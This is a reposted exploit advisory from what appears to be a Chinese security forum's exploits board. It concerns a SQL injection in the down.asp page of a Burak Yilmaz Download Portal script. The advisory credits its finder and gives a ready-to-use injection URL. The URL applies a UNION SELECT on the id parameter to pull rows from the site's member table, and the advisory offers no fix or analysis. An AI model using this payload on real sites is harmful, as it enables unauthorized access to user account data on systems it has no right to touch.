Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-12-20 13:38 只看该作者

Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability

复制内容到剪贴板

代码:

</p><pre># LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Burak Y.lmaz Download Portal

# Script Download : [url]http://maxiasp.com/sc_yorum.asp?scno=929[/url]

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The R鄠| DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : down.asp

#Vuln :
[url]http://www.victim.com/ScriptPath/down.asp?id=[/url][SqL]
[url]http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20[/url]*%20FROM%20uyeler%20WHERE%20uid=36

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# </pre><p>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability